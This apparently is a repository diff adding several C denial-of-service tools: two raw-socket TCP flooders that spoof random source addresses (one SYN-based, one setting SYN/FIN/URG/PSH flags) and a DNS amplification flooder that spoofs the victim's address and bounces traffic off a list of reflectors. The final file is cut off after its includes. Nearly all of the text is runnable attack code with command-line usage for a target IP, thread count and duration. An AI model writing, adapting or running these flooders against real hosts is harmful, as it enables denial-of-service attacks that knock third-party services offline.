#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->fin = 1;
|
||||
tcph->urg = 1;
|
||||
tcph->psh = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (rand() % 20480);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons (rand() % 20480);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, ":: motherfucking error.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, ":: sending all the packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,197 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <time.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
char ip[17];
|
||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 3;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(0));
|
||||
fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,197 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <time.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
char ip[17];
|
||||
snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr(ip);
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 0;
|
||||
tcph->res2 = 2;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(0));
|
||||
fprintf(stdout, "Tank: So what do you need? Besides a miracle.\nNeo: Packets. Lots of packets.\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,191 @@
|
|||
/* ADNS Protocol Amplification */
|
||||
|
||||
/* Made by Shroom, credit me cus im swag for payload and idk for original ssdp script. */
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
|
||||
/* function for header checksums */
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 16;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(53);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x00\x0a\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07\x56\x45\x5", 16);
|
||||
udph->len=htons(sizeof(struct udphdr) + 16);
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = sin.sin_port;
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
int i=0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
if(i==5)
|
||||
{
|
||||
usleep(0);
|
||||
i=0;
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 4){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(atoi(argv[2]));
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
if(argc > 5)
|
||||
{
|
||||
sleep(atoi(argv[5]));
|
||||
} else {
|
||||
while(1){
|
||||
sleep(1);
|
||||
}
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,200 @@
|
|||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/in.h>
|
||||
#include <signal.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <math.h>
|
||||
#include <ctype.h>
|
||||
#include <errno.h>
|
||||
